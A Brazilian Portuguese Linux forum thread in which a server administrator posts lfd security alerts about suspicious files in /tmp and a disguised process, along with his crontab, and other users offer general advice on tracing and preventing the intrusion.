Mar 30 11:09:31 server lfd[29581]: *Suspicious Process* PID:21807 PPID:21800 User:bppromo Uptime:88 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br/dns_cache.db -R 250 -p -n img.boaspromocoes.com.br -o /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br /usr/local/apache/domlogs/img.boaspromocoes.com.br.bkup
Mar 30 11:09:31 server lfd[29581]: *Suspicious Process* PID:21808 PPID:21800 User:bppromo Uptime:88 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br/dns_cache.db -R 250 -p -n img.boaspromocoes.com.br -o /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br /usr/local/apache/domlogs/img.boaspromocoes.com.br.bkup
Mar 30 11:09:32 server lfd[29581]: *Suspicious Process* PID:21810 PPID:21800 User:bppromo Uptime:88 secs EXE:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil CMD:/usr/local/cpanel/3rdparty/bin/webalizer_lang/portuguese_brazil -N 10 -D /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br/dns_cache.db -R 250 -p -n img.boaspromocoes.com.br -o /home/bppromo/tmp/webalizer/img.boaspromocoes.com.br /usr/local/apache/domlogs/img.boaspromocoes.com.br.bkup
Mar 30 11:12:31 server lfd[12764]: *Suspicious Process* PID:5618 PPID:29903 User:cavvesc Uptime:83 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:12:31 server lfd[12764]: *Suspicious Process* PID:11475 PPID:9607 User:nobody Uptime:15499 secs EXE:/tmp/.nynew5/b CMD:/usr/sbin/httpd
Mar 30 11:18:06 server lfd[8922]: *Suspicious File* /tmp/.nynew5 [nobody:nobody (99:99)] - Suspicious directory
Mar 30 11:20:31 server lfd[21881]: *Suspicious Process* PID:2970 PPID:2970 User:nobody Uptime:1140202 secs EXE:/usr/bin/perl CMD:/usr/local/apache/bin/httpd -DSSL
Mar 30 11:23:08 server lfd[5072]: *Suspicious File* /tmp/.nynew5/print [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 11:23:08 server lfd[5072]: *Suspicious File* /tmp/.nynew5/b [nobody:nobody (99:99)] - Linux Binary
Mar 30 11:23:08 server lfd[5072]: *Suspicious File* /tmp/.nynew5/r [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 11:24:33 server lfd[13657]: *Suspicious Process* PID:12404 PPID:12067 User:cavvesc Uptime:349 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:27:34 server lfd[31574]: *Suspicious Process* PID:13966 PPID:12067 User:cavvesc Uptime:178 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:28:10 server lfd[2943]: *Suspicious File* /tmp/.nynew5/f [nobody:nobody (99:99)] - Script, starts with #!
Mar 30 11:28:35 server lfd[5573]: *Suspicious Process* PID:10597 PPID:10597 User:nobody Uptime:472285 secs EXE:/usr/bin/perl CMD:[bash]
Mar 30 11:30:36 server lfd[17552]: *Suspicious Process* PID:934 PPID:31838 User:cavvesc Uptime:165 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:32:37 server lfd[29500]: *Suspicious Process* PID:888 PPID:31838 User:bppromo Uptime:287 secs EXE:/usr/bin/php CMD:/usr/bin/php
Mar 30 11:47:42 server lfd[16994]: *Suspicious Process* PID:6191 PPID:31838 User:cavvesc Uptime:1139 secs EXE:/usr/bin/php CMD:/usr/bin/php

Vejam que ele baixou listas de IP e executou esse wn.php

O arquivo wn.php não está mais lá, pelo que percebi ele apagou e deve usar novamente depois.

Como faço para encontrar a brecha que esse cara ta usando pra entrar no servidor?

0 0
  • Quote

    •   


    2. Re: Servidor sendo invadido e não consigo descobrir como

    Daniel Lara Souza
    danniel-lara
    (usa Fedora)

    Enviado em 30/03/2015 - 15:14h


    verifica os processos rodando , verificamos esses diretórios dentro do /tmp
    verifica os usuários , verificamos o crontab , etc..

    0 0
  • Quote

    • 3. Re: Servidor sendo invadido e não consigo descobrir como

    Patrick
    patricknn
    (usa Outra)

    Enviado em 30/03/2015 - 15:21h


    Verifiquei todos os processos rodando e não tinha nada demais, apenas coisas que foram executadas por esses arquivos ai

    Os arquivos dentro do TMP eu deletei todos, mas ja tinha deletado uma vez e voltaram

    O Crontab ta assim:

    0 6 * * * /usr/local/cpanel/scripts/exim_tidydb > /dev/null 2>&1
    30 5 * * * /usr/local/cpanel/scripts/optimize_eximstats > /dev/null 2>&1
    2,58 * * * * /usr/local/bandmin/bandmin
    0 0 * * * /usr/local/bandmin/ipaddrmap
    0 4 * * * /usr/local/cpanel/scripts/upcp --cron
    0 1 * * * /usr/local/cpanel/scripts/cpbackup
    0 2 * * * /usr/local/cpanel/bin/backup
    35 * * * * /usr/bin/test -x /usr/local/cpanel/bin/tail-check && /usr/local/cpanel/bin/tail-check
    45 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_mailman_cache && /usr/local/cpanel/scripts/update_mailman_cache
    30 */4 * * * /usr/bin/test -x /usr/local/cpanel/scripts/update_db_cache && /usr/local/cpanel/scripts/update_db_cache
    45 */8 * * * /usr/bin/test -x /usr/local/cpanel/bin/optimizefs && /usr/local/cpanel/bin/optimizefs
    30 */2 * * * /usr/local/cpanel/bin/mysqluserstore >/dev/null 2>&1
    15 */2 * * * /usr/local/cpanel/bin/dbindex >/dev/null 2>&1
    15 */6 * * * /usr/local/cpanel/scripts/autorepair recoverymgmt >/dev/null 2>&1
    */5 * * * * /usr/local/cpanel/bin/dcpumon >/dev/null 2>&1
    37 4 * * * /usr/local/cpanel/whostmgr/docroot/cgi/cpaddons_report.pl --notify
    10,25,40,55 * * * * /usr/local/cpanel/whostmgr/bin/dnsqueue > /dev/null 2>&1

    Não vi nada demais ai

    Os usuários, eu verifiquei e todos eles, nenhum logou no SSH, apenas o meu, e o meu não foi logado por nenhum IP estranho e a senha não é algo comum e demoraria anos para ser quebrada. como tenho firewall, a cada 3 tentativas é bloqueado o IP.

    Percebi que os arquivos só aparecem dentro do TMP.

    0 0
  • Quote

    • 4. Re: Servidor sendo invadido e não consigo descobrir como

    Daniel Lara Souza
    danniel-lara
    (usa Fedora)

    Enviado em 30/03/2015 - 15:38h


    ok agora verifica esses arquivos dentro do /tmp



    0 0
  • Quote

    • 5. Re: Servidor sendo invadido e não consigo descobrir como

    Patrick
    patricknn
    (usa Outra)

    Enviado em 30/03/2015 - 15:42h


    Eu verifiquei, eles eram scripts que baixavam uma lista de IPs e começava a fazer brute force neles com uma lista de usuarios e senha.
    Eu ja deletei eles.


    0 0
  • Quote

    • 6. Re: Servidor sendo invadido e não consigo descobrir como

    Daniel Lara Souza
    danniel-lara
    (usa Fedora)

    Enviado em 30/03/2015 - 15:43h


    blz ; agora tu tem que fazer uma preventiva nesse servidor para que não ocorra novamente

    0 0
  • Quote

    • 7. Re: Servidor sendo invadido e não consigo descobrir como

    Andre Ribeiro da Costa
    andr3ribeiro
    (usa Arch Linux)

    Enviado em 30/03/2015 - 15:50h

    Ele já tinha verificado usuários, cron, a pasta tmp, etc... preventiva é exatamente a ajuda que ele pediu ao abrir o tópico.

    0 0
  • Quote

    • 8. Re: Servidor sendo invadido e não consigo descobrir como

    Patrick
    patricknn
    (usa Outra)

    Enviado em 30/03/2015 - 15:51h


    O problema é que a ultima vez eu deletei os arquivos mas apareceram denovo, ou seja, o cara ainda tava conseguindo acessar.
    Sobre a preventiva eu mudei bastante coisa que o ConfigServer & Firewall pediu, ai vamos ver.

    Tb tentei rodar alguns softwares que procuram por malwares mas nao encontraram nada.


    0 0
  • Quote

    • 9. Re: Servidor sendo invadido e não consigo descobrir como

    Fernando A. Vita
    fernandoavita
    (usa Debian)

    Enviado em 31/03/2015 - 01:32h


    Não que eu tenha muito conhecimento pra falar do assunto, mas numa situação assim até valia o esforço de testar uns scans de vulnerabilidades e verificar se ele fornece alguma ajuda. (é bom escolher bem a hora e pegar leve pra não sobrecarregar o servidor)

    É bem comum atacantes explorarem vulnerabilidades utilizando alguma funcionalidade (mal implementada) de algum site. A partir disso você pode ter problemas de LFI, RFI e várias outras coisas.

    Enfim, não posso falar muito do que eu não sei muito :)

    0 0
  • Quote

    • 10. Re: Servidor sendo invadido e não consigo descobrir como

    Patrick
    patricknn
    (usa Outra)

    Enviado em 31/03/2015 - 09:12h


    Vocês poderiam me indicar algum scanner de vunerabilidades free?

    Obrigado

    0 0
  • Quote

    • 11. Re: Servidor sendo invadido e não consigo descobrir como

    Fabio Tybucheski
    binhoty
    (usa Debian)

    Enviado em 31/03/2015 - 09:25h

    Olá Amigo... Eu primeiramente fecharia todas as portas do Firewall mesmo que derrube os Serviços... Após isso liberaria algumas principais pra atender a necessidade dos seus serviços cruciais do servidor... Tenta verificar por qual acesso o cara está entrando.. Coloca um Wireshark na rede e verifica a conexão que esse cara ta pegando... Dessa forma sabe por onde está havendo falha na segurança e fica mais fácil de filtrar o problema e resolver...


    Fabio Tybucheski
    Analista de Suporte
    binhoty@gmail.com

    0 0
  • Quote





    • Patrocínio

    Site hospedado pelo provedor RedeHost.
    Linux banner

    Destaques

    Artigos

    Instalar certificado digital Safesign, fornecido pela Certisign e utilizado pela OAB-SP, em qualquer distribuição Linux usando distrobox

    Manutenção de sistemas Linux Debian e derivados com apt-get, apt, aptitude e dpkg

    Criatividade para TI parte 1

    Melhorando o tempo de boot do Fedora e outras distribuições

    Como instalar as extensões Dash To Dock e Hide Top Bar no Gnome 45/46

    Dicas

    Como Atualizar Fedora 39 para 40

    Instalar Google Chrome no Debian e derivados

    Consertando o erro do Sushi e Wayland no Opensuse Leap 15

    Instalar a última versão do PostgreSQL no Lunix mantendo atualizado

    Flathub na sua distribuição Linux e comandos básicos de gerenciamento

    Tópicos

    iso de sistema 32 bit em atividade (6)

    erro ao clonar repo github (9)

    ASRock H310CM-HG4 vs Linux (14)

    pacotes 32 bit no void 64 bit (2)

    Lançado Ubuntu 24.04 Final (0)

    Top 10 do mês

    Scripts

    [Python] Adicione a opção Redimensionar e rotacionar imagens ao Nautilus

    [Shell Script] Script para desinstalar pacotes desnecessários no OpenSuse

    [Shell Script] Script para criar certificados de forma automatizada no OpenVpn

    [Shell Script] Conversor de vídeo com opção de legenda

    [C/C++] BRT - Bulk Renaming Tool

    A maior comunidade GNU/Linux da América Latina! Artigos, dicas, tutoriais, fórum, scripts e muito mais. Ideal para quem busca auto-ajuda.

    Site hospedado por: